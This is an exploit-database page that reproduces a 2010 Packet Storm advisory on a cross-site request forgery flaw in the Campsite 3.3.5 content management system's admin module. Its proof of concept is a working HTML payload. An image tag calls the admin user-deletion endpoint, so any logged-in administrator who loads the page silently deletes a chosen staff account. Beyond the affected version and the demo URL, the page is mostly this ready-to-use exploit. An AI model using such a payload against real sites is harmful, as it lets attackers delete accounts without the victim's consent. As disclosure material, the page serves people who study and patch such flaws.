Lucene search
K

Campsite 3.3.5 Cross Site Request Forgery

🗓️ 10 Mar 2010 00:00:00Reported by Pratul AgrawalType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 17 Views

Campsite 3.3.5 CSRF Vulnerability in Admin Module by Pratul Agrawa

Code
` =======================================================================  
  
campsite 3.3.5 CSRF Vulnerability  
  
=======================================================================  
  
by  
  
Pratul Agrawal  
  
  
  
# Vulnerability found in- Admin module  
  
# email [email protected]  
  
# company aksitservices  
  
# Credit by Pratul Agrawal  
  
# Category CMS / Portals  
  
# Site p4ge http://campsite-demo.campware.org/admin/login.php  
  
# Plateform php  
  
  
  
# Proof of concept #  
  
Targeted URL: http://campsite-demo.campware.org/admin/login.php  
  
  
Script to delete the Admin user through Cross Site request forgery  
  
. ..................................................................................................................  
  
<html>  
  
<body>  
  
<img src=http://campsite-demo.campware.org/admin/users/do_del.php?User=[userID]&uType=Staff />  
  
</body>  
  
</html>  
  
  
. ..................................................................................................................  
  
  
  
After execution refresh the page and u can see that user having giving ID get deleted automatically.  
  
  
#If you have any questions, comments, or concerns, feel free to contact me.  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation